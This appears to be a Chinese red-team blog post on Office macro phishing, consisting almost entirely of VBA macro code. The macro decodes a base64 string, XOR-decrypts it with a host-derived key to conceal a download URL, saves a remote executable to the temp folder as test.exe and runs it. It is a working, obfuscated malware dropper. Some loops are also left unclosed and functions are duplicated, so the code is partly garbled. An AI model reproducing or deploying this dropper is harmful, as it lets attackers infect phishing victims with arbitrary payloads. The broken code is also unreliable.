
admin 2020年10月30日20:14:13评论358 views字数 6371阅读21分14秒阅读模式



office宏钓鱼就不多说了,在之前红蓝对抗之邮件钓鱼攻击 也有所提及。







Function GetByte(needle)
    Dim haystack
    haystack = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    GetByte = InStr(1, haystack, needle, vbBinaryCompare) - 1
    If GetByte = -1 Then
        Err.Raise 513, "DecodeBase64", "Invalid character in base64 string"
    End If
End Function

Private Function DecodeBase64(strData)
    Dim i, inCount, outCount, firstTime
    Dim inArray(0 To 3) As Integer
    Dim outArray() As Byte

    If Len(strData) Mod 4 <> 0 Then
        Err.Raise 514, "DecodeBase64", "Base64 string length is not multiple of four"
    End If

    Rem Each quartet generates up to three bytes.

    firstTime = True
    While Len(strData) > 0
        Rem Get incoming values (up to "="), counting them.

        inCount = 0
        For i = 1 To 4
            If Mid(strData, i, 1) <> "=" Then
                inArray(i - 1) = GetByte(Mid(strData, i, 1))
                inCount = inCount + 1
                Exit For
            End If

        Rem Must have four non-"=" characters unless at end.

        If Len(strData) > 4 And inCount <> 4 Then
            Err.Raise 515, "DecodeBase64", "Base64 string has '=' characters in middle"
        End If

        Rem Must have at least two non-"=" characters.

        If inCount < 2 Then
            Err.Raise 516, "DecodeBase64", "Base64 string has invalid ending"
        End If

        Rem Work out output bytes based on input (2->1, 3->2, 4->3) and expand array.

        outCount = inCount - 1
        If firstTime Then
            ReDim outArray(outCount - 1)
            firstTime = False
            ReDim Preserve outArray(UBound(outArray) + outCount)
        End If

        Rem Add elements to output.

        outArray(UBound(outArray) + 1 - outCount) = (inArray(0) And &H3F) * 4 + (inArray(1) And &H30) / 16
        If outCount >= 2 Then
            outArray(UBound(outArray) + 2 - outCount) = (inArray(1) And &HF) * 16 + (inArray(2) And &H3C) / 4
        End If
        If outCount >= 3 Then
            outArray(UBound(outArray) + 3 - outCount) = (inArray(2) And &H3) * 64 + (inArray(3) And &H3F)
        End If

        strData = Mid(strData, 5)

    DecodeBase64 = outArray
End Function











Option Explicit
Sub test()
    Dim sKey As String
    Dim payload As String
    Dim DownloadURL As String
    Dim Godownload As String
    Dim dllpath As String
    sKey = Environ("PROCESSOR_REVISION")
    payload = StrConv(DecodeBase64("eHh4UhJFEktgIE9PE0hQWw5aEFkIUglTAUNQWwteT1sFXQMYAl0O"), vbUnicode)
    DownloadURL = XororC(payload, sKey)
    dllpath = Downloadstring(DownloadURL)
    Godownload = Rundll(dllpath)
End Sub

Function Rundll(ByVal dllpath As String) As String
Shell (dllpath)
End Function

Function Downloadstring(ByVal DownloadURL As String) As String

Dim oStream As Object
Dim myURL As String
Dim savename As String
savename = "test.exe"
Dim dstPath As String
dstPath = Environ$("TEMP") & "" & savename

Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", DownloadURL, False, "username", "password"

If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile dstPath, 2 ' 1 = no overwrite, 2 = overwrite
End If

Downloadstring = dstPath
End Function

Function XororC(ByVal sData As String, ByVal sKey As String) As String
    Dim l As Long, i As Long, byIn() As Byte, byOut() As Byte, byKey() As Byte
    Dim bEncOrDec As Boolean
    If Len(sData) = 0 Or Len(sKey) = 0 Then XororC = "Invalid argument(s) used": Exit Function

    If Left$(sData, 3) = "xxx" Then
        bEncOrDec = False
        sData = Mid$(sData, 4)
        bEncOrDec = True
    End If
    byIn = sData
    byOut = sData
    byKey = sKey
    l = LBound(byKey)
    For i = LBound(byIn) To UBound(byIn) - 1 Step 2
        byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec
        l = l + 2
        If l > UBound(byKey) Then l = LBound(byKey)
    Next i
    XororC = byOut
    If bEncOrDec Then XororC = "xxx" & XororC
End Function

Function GetByte(needle)
    Dim haystack
    haystack = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    GetByte = InStr(1, haystack, needle, vbBinaryCompare) - 1
    If GetByte = -1 Then
        Err.Raise 513, "DecodeBase64", "Invalid character in base64 string"
    End If
End Function

Private Function DecodeBase64(strData)
    Dim i, inCount, outCount, firstTime
    Dim inArray(0 To 3) As Integer
    Dim outArray() As Byte

    If Len(strData) Mod 4 <> 0 Then
        Err.Raise 514, "DecodeBase64", "Base64 string length is not multiple of four"
    End If

    Rem Each quartet generates up to three bytes.

    firstTime = True
    While Len(strData) > 0
        Rem Get incoming values (up to "="), counting them.

        inCount = 0
        For i = 1 To 4
            If Mid(strData, i, 1) <> "=" Then
                inArray(i - 1) = GetByte(Mid(strData, i, 1))
                inCount = inCount + 1
                Exit For
            End If

        Rem Must have four non-"=" characters unless at end.

        If Len(strData) > 4 And inCount <> 4 Then
            Err.Raise 515, "DecodeBase64", "Base64 string has '=' characters in middle"
        End If

        Rem Must have at least two non-"=" characters.

        If inCount < 2 Then
            Err.Raise 516, "DecodeBase64", "Base64 string has invalid ending"
        End If

        Rem Work out output bytes based on input (2->1, 3->2, 4->3) and expand array.

        outCount = inCount - 1
        If firstTime Then
            ReDim outArray(outCount - 1)
            firstTime = False
            ReDim Preserve outArray(UBound(outArray) + outCount)
        End If

        Rem Add elements to output.

        outArray(UBound(outArray) + 1 - outCount) = (inArray(0) And &H3F) * 4 + (inArray(1) And &H30) / 16
        If outCount >= 2 Then
            outArray(UBound(outArray) + 2 - outCount) = (inArray(1) And &HF) * 16 + (inArray(2) And &H3C) / 4
        End If
        If outCount >= 3 Then
            outArray(UBound(outArray) + 3 - outCount) = (inArray(2) And &H3) * 64 + (inArray(3) And &H3F)
        End If

        strData = Mid(strData, 5)

    DecodeBase64 = outArray
End Function



2、function函数return的时候,就写functionname = 值 即可


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  • 本文由 发表于 2020年10月30日20:14:13
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